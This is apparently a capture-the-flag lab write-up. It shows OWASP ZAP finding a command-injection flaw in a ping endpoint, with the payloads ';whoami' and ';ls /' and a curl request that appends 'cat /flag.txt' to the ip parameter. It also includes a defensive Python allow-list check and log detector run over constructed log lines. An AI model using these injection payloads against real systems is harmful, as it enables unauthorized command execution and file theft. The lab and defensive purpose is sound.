HTB - ZAP Scanner — Reading the Flag /flag.txt



OWASP ZAP Pwnbox



Goal

Run OWASP ZAP against the target to discover directories and find a high-risk vulnerability that lets you read the flag at /flag.txt.

Target (example): http://94.237.54.192:48657
Replace with the current target when testing — the target changes.


Tools

  • OWASP ZAP (Pwnbox: Pentest Programs)
  • Browser with ZAP proxy configured
  • curl (for quick verification)

Quick Start

  1. Open ZAP in Pwnbox.
  2. Add or visit the target while ZAP proxy is enabled.
  3. Run Spider to enumerate directories.
  4. Look for High Risk issues in the Sites/Alerts tabs.
  5. Test suspected injection points and retrieve /flag.txt.

Step-by-step Walkthrough

1. Start ZAP & Discover

  • Open ZAP in Pwnbox.
  • Add the target manually or browse to it while ZAP proxy is enabled.
  • Run Spider (important — finds endpoints that passive scanning might miss).

2. Inspect Endpoints

  • Check the Sites tab after Spider finishes.
  • Explore endpoints and check the Alerts list for High Risk findings.

3. Vulnerability — Command Injection

  • Vulnerable endpoint discovered:

/devtools/ping.php?ip=

  • Test for injection by sending payloads to ip, such as:

;whoami
;ls /

If you see command output, the app is executing shell commands from the ip parameter.


4. Read the Flag

  • Use a payload that appends cat /flag.txt to the ip parameter (URL-encoded):

http://94.237.54.192:48657/devtools/ping.php?ip=127.0.0.1%3Bcat%20%2Fflag.txt

Example: curl

curl "http://94.237.54.192:48657/devtools/ping.php?ip=127.0.0.1%3Bcat%20%2Fflag.txt"

Expected output (example):

HTB{xxx-xxx-xxx}
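For the defender's side of this finding, an added example (not code from the original write-up or from the HTB target): a strict allow-list check of the kind the fixed ping.php should apply to the ip parameter, plus detection logic that flags requests whose ip value is not a literal IP address, run over constructed sample access-log lines. The client address, timestamps and log lines are constructed placeholders.

```python
import ipaddress
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (not from the original post). The
# third and fourth requests carry the injection payloads the write-up shows.
SAMPLE_LOG = """\
10.10.14.5 - - [06/Nov/2025:11:20:01 +0000] "GET /devtools/ping.php?ip=127.0.0.1 HTTP/1.1" 200 512
10.10.14.5 - - [06/Nov/2025:11:20:09 +0000] "GET /index.php HTTP/1.1" 200 1024
10.10.14.5 - - [06/Nov/2025:11:20:15 +0000] "GET /devtools/ping.php?ip=127.0.0.1%3Bcat%20%2Fflag.txt HTTP/1.1" 200 640
10.10.14.5 - - [06/Nov/2025:11:20:20 +0000] "GET /devtools/ping.php?ip=%3Bwhoami HTTP/1.1" 200 300
"""

# Pulls the request line out of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

VULNERABLE_PATH = "/devtools/ping.php"


def is_strict_ip(value: str) -> bool:
    """Allow-list check: accept only a literal IPv4/IPv6 address.

    This is the validation the fixed ping.php should perform before the
    value goes anywhere near a shell; anything else (';', spaces, paths)
    is rejected outright instead of being escaped.
    """
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def suspicious_ip_params(log_text: str) -> list:
    """Return (raw_value, decoded_value) pairs for ping.php requests whose
    ip parameter is not a plain IP address, i.e. injection candidates."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        if parts.path != VULNERABLE_PATH:
            continue
        # Walk the raw query so the percent-encoded form is kept for the report.
        for pair in parts.query.split("&"):
            key, _, raw = pair.partition("=")
            if key != "ip":
                continue
            decoded = unquote_plus(raw)  # %3B -> ';', %20 -> ' ', %2F -> '/'
            if not is_strict_ip(decoded):
                hits.append((raw, decoded))
    return hits
```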
  • Title: HTB - ZAP Scanner — Reading the Flag /flag.txt
  • Author: Depe
  • Created at: 2025-11-06 11:24:16
  • Updated at: 2025-11-06 11:29:58
  • Link: https://depe.blog/HTB-ZAP-Scanner-—-Reading-the-Flag-flag-txt/
  • License: This work is licensed under CC BY-NC-SA 4.0.